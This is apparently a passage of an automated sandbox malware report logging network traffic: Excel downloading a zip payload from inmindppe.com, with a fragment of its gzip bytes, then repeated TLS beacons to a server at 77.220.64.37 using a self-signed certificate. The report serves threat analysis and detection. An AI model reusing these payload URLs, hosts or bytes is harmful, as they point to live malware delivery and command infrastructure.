                                                                  Jan 11, 2021 16:52:11.591788054 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.591799021 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.591804028 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.591841936 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.591845036 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.591886997 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.592273951 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.592314959 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.592327118 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.592351913 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.592364073 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.592389107 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.592401981 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.592434883 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.594166994 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.594206095 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.594240904 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.594244957 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.594266891 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.594283104 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.594295025 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.594342947 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604407072 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604460955 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604496956 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604501963 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604540110 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604541063 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604554892 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604587078 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604635000 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604674101 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604681969 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604712963 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604718924 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.604752064 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.604765892 CET4916780192.168.2.22160.153.133.116

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 11, 2021 16:52:11.303742886 CET5219753192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:11.368813992 CET53521978.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:16.102725983 CET5309953192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:16.159302950 CET53530998.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:16.173299074 CET5283853192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:16.232958078 CET53528388.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:48.119407892 CET6120053192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:48.167299032 CET53612008.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:48.184457064 CET4954853192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:48.232584000 CET53495488.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:49.228758097 CET5562753192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:49.276504040 CET53556278.8.8.8192.168.2.22
                                                                  Jan 11, 2021 16:52:49.288161993 CET5600953192.168.2.228.8.8.8
                                                                  Jan 11, 2021 16:52:49.338207960 CET53560098.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jan 11, 2021 16:52:11.303742886 CET192.168.2.228.8.8.80x7e45Standard query (0)inmindppe.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jan 11, 2021 16:52:11.368813992 CET8.8.8.8192.168.2.220x7e45No error (0)inmindppe.com160.153.133.116A (IP address)IN (0x0001)
                                                                  Jan 11, 2021 16:52:49.276504040 CET8.8.8.8192.168.2.220xa163No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                  Jan 11, 2021 16:52:49.276504040 CET8.8.8.8192.168.2.220xa163No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                  Jan 11, 2021 16:52:49.338207960 CET8.8.8.8192.168.2.220x5489No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                  Jan 11, 2021 16:52:49.338207960 CET8.8.8.8192.168.2.220x5489No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • inmindppe.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249167160.153.133.11680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jan 11, 2021 16:52:11.434149027 CET0OUTGET /eb3kd1le.zip HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: inmindppe.com
                                                                  Connection: Keep-Alive
                                                                  Jan 11, 2021 16:52:11.492672920 CET2INHTTP/1.1 200 OK
                                                                  Date: Mon, 11 Jan 2021 15:52:11 GMT
                                                                  Server: Apache
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, Keep-Alive
                                                                  Last-Modified: Thu, 19 Nov 2020 20:01:43 GMT
                                                                  ETag: "c0582-4de00-5b47b3264d7c0-gzip"
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding,User-Agent
                                                                  Content-Encoding: gzip
                                                                  Keep-Alive: timeout=5
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: application/zip
                                                                  Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 54 14 47 f8 37 0a 57 37 20 20 e8 a0 82 83 82 4a 98 d6 51 d9 66 c1 2d 68 44 c1 2d a0 8e 20 0c 0a 2a ca 32 e3 88 42 60 88 0b 28 18 86 28 36 13 8d 82 a3 42 dc 50 31 6e 80 a0 22 a8 e0 8a 06 14 c4 65 8c 90 48 dc a6 15 17 a2 c6 5d fa 3e 35 83 c9 4c fe ef 7b ef f7 9d 73 bf 73 ef 39 5f f0 3c f6 d3 55 d5 bf ae ae 7a ea a9 5f 55 57 d7 4c 9e b9 0e 99 21 84 cc 41 58 16 a1 72 64 f8 f3 45 ff d7 7f e9 20 5d fb 55 74 45 65 d6 97 bf 28 27 02 2f 7f 31 5d 3e 3f c9 25 21 31 5e 96 38 77 a1 4b d4 dc 45 8b e2 95 2e f3 62 5c 12 93 17 b9 cc 5f e4 e2 3f 35 d8 65 61 7c 74 8c 67 97 2e 9d a9 0e 0c c9 38 84 02 09 6b 34 2d f6 e3 9c cf b8 2d a8 eb 17 36 04 29 42 cb 20 57 91 86 b0 86 01 f0 9f dd df 19 b3 d3 eb a4 21 df 08 fd 73 44 be 16 7f 9f 90 1d 49 f5 69 ff 3e fe 7d d0 ff 6d fa 0e a1 6c bd 66 81 52 3d ff 17 0f 29 b0 40 03 ad ff 3f 28 8c 7f fd 15 7f 0f b8 66 ff fb 78 4f 65 cc 12 25 1c 5f 50 1d 19 c2 cf 67 6e 9a c6 05 9e de 33 31 7a ae 72 2e 42 7f e0 00 5f 64 78 a8 c1 a6 e9 20 d8 d7 90 4e 8c 6e e1 7b 4a 3a b0 dc ff 17 e9 44 06 bd 33 fe 2f b2 03 4f f0 bf c3 13 19 d2 25 74 a4 13 fd 2f d2 19 b2 87 26 3a 21 83 41 38 83 78 ff 8f 74 d5 fa e7 85 f0 ba 20 c8 d8 76 08 9c 6e 6e c8 a7 e9 f3 c2 7d 93 12 a3 40 37 d4 85 85 21 6f bb 4c 0b c6 90 bf 98 b8 78 48 a8 af 1b a8 23 7d 46 af ff 8f 74 63 d1 7f 7f ff a7 7f 21 f4 93 69 a1 f4 38 db ac 71 1f e9 2e 76 79 c8 2e 6b b2 95 3c a2 1b 42 0a c4 3a 28 d3 91 1d 1d f2 51 5d 46 c6 ee e8 84 4c 82 cd da e8 71 56 66 02 7a b2 55 96 90 0e b1 a2 49 0f 9c 04 9f 12 b3 e9 07 b3 ce d6 75 fc 61 fc 1d d5 5b 00 17 6e 10 f3 31 8c 66 76 34 c3 99 64 47 19 fe 9f 6e fc ff ea 9f 43 39 5c c4 de fd 37 7e cd b8 8f 7f 56 20 04 19 a2 7d 25 c6 91 86 f8 7f 9f 4f db c1 00 0c 3d f1 63 d6 e4 8f f0 74 59 0e 7b f1 29 64 0f 5f 09 f1 f8 11 eb 56 23 bb ff 8e ff 1d ff 3b fe 77 fc ef f8 df f1 bf e3 7f c7 ff 8e ff 1d ff 3b fe 77 fc ef f8 df f1 bf e3 ff ff 1c e5 ce 76 08 d4 06 50 59 87 e2 ef 91 5d c6 db 4e 4a f2 f2 30 fd bc 42 08 fd 64 07 9e 3f 28 b0 cf 83 94 4b d2 e1 bf d5 e9 38 61 19 24 94 b0 0e e5 70 28 70 84 b8 72 5f 84 90 e4 38 9e cf 9a c6 0e c1 a9 d9 21 af f0 74 c6 10 1c 3b 83 ee 82 0f 74 f5 ff d5 3f f9 b1 2f 90 dd b4 b3 05 ce 38 75 17 fc 7f 56 97 27 78 fe 42 3f 8b 91 e5 70 00 fe af b1 c0 f3 24 a7 0e 20 b4 03 2b b4 3e 81 3a 87 d8 5e 65 86 b2 f4 73 28 fa 70 0f 9c a2 40 7f 8a 71 0c d3 24 f0 3c 19 4f 6c 77 24 64 e1 19 9b 57 35 e3 de e6 e0 39 a0 c9 6f 2f 10 f9 74 c8 5b ce 51 32 83 11 c3 e9 6a 02 ce 2e 8c 25 76 d0 e3 20 70 22 91 f1 48 0c 01 ab bf 26 e0 fc 82 2f 59 08 49 38 47 a7 91 19 8f c5 10 b0 5a 42 62 84 31 66 9b f4 10 63 cd 3a 30 c6 98 e9 41 cc 77 1b 40 cc 3f 83 98 eb 41 2c 36 1b 40 2c 3e 83 58 e8 41 3a e5 18 40 3a 7d 06 e9 a4 07 b1 dc 68 00 b1 fc 0c 62 a9 07 b1 da 64 00 b1 fa 0c 62 a5 07 b1 5e 6b 00 b1 fe 0c 62 ad 07 e9 7c c8 00 d2 f9 33 48 67 3d 88 4d ae 01 c4 e6 33 88 8d 1e c4 36 da 00 62 fb 19 c4 56 0f d2 25 ce 00 d2 e5 33 48 17
                                                                  Data Ascii: 1faaTG7W7 JQf-hD- *2B`((6BP1n"eH]>5L{ss9_<Uz_UWL!AXrdE ]UtEe('/1]>?%!1^8wKE.b\_?5ea|tg.8k4--6)B W!sDIi>}mlfR=)@?(fxOe%_Pgn31zr.B_dx Nn{J:D3/O%t/&:!A8xt vnn}@7!oLxH#}Ftc!i8q.vy.k<B:(Q]FLqVfzUIua[n1fv4dGnC9\7~V }%O=ctY{)d_V#;w;wvPY]NJ0Bd?(K8a$p(pr_8!t;t?/8uV'xB?p$ +>:^es(p@q$<Olw$dW59o/t[Q2j.%v p"H&/YI8GZBb1fc:0Aw@?A,6@,>XA:@:}hbdb^kb|3Hg=M36bV%3H


                                                                  HTTPS Packets

                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                  Jan 11, 2021 16:52:15.334491014 CET77.220.64.37443192.168.2.2249168CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:20.144717932 CET77.220.64.37443192.168.2.2249173CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:22.272886992 CET77.220.64.37443192.168.2.2249177CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:24.377834082 CET77.220.64.37443192.168.2.2249181CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:26.483844995 CET77.220.64.37443192.168.2.2249185CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:28.591475010 CET77.220.64.37443192.168.2.2249189CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:30.659601927 CET77.220.64.37443192.168.2.2249193CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:32.743416071 CET77.220.64.37443192.168.2.2249197CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:34.824404001 CET77.220.64.37443192.168.2.2249201CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:38.580311060 CET77.220.64.37443192.168.2.2249205CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:40.914674997 CET77.220.64.37443192.168.2.2249209CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:42.972027063 CET77.220.64.37443192.168.2.2249213CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:45.013258934 CET77.220.64.37443192.168.2.2249217CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:47.122772932 CET77.220.64.37443192.168.2.2249221CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:49.165604115 CET77.220.64.37443192.168.2.2249226CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:51.330600023 CET77.220.64.37443192.168.2.2249231CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:53.496804953 CET77.220.64.37443192.168.2.2249235CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:56.130652905 CET77.220.64.37443192.168.2.2249239CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:52:58.192353010 CET77.220.64.37443192.168.2.2249243CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:00.251307964 CET77.220.64.37443192.168.2.2249247CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:02.306617022 CET77.220.64.37443192.168.2.2249251CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:04.397885084 CET77.220.64.37443192.168.2.2249255CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:06.462219000 CET77.220.64.37443192.168.2.2249259CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:08.533596992 CET77.220.64.37443192.168.2.2249263CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:10.686743975 CET77.220.64.37443192.168.2.2249267CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:13.591594934 CET77.220.64.37443192.168.2.2249271CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:15.664871931 CET77.220.64.37443192.168.2.2249275CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:17.771724939 CET77.220.64.37443192.168.2.2249279CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:19.877722025 CET77.220.64.37443192.168.2.2249283CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:22.025923014 CET77.220.64.37443192.168.2.2249287CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:24.154860973 CET77.220.64.37443192.168.2.2249291CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:26.273279905 CET77.220.64.37443192.168.2.2249295CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                  Jan 11, 2021 16:53:28.460499048 CET77.220.64.37443192.168.2.2249299CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
